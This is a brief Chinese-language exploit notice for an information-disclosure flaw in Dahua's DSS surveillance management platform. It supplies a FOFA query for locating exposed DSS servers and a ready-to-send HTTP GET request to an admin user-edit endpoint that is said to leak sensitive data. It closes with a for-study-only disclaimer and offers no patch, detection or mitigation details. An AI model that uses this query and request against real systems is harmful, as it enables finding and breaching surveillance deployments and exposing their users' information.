0x01 产品简介
DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。 可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。
0x02 漏洞概述
大华DSS存在信息泄露漏洞,攻击者可以通过该漏洞获取服务器敏感信息,造成大量敏感信息泄露。
0x03 测绘语句
fofa:title=="DSS"
0x04 漏洞复现
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
0x05 影响范围
大华DSS
0x06 免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。